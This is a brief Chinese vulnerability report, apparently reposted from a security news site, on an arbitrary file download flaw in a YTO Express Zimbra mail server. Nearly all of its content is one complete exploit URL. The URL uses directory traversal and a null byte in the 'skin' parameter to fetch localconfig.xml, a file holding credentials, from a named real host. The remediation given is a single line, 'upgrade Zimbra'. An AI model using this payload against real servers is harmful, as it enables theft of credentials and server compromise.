圆通某站点任意文件下载导致信息泄漏下载

来源:黑吧安全网 浏览:525次 时间:2014-06-27
做网站找雨过天晴工作室

http://mail.yto.net.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

修复方案:

升级zimbra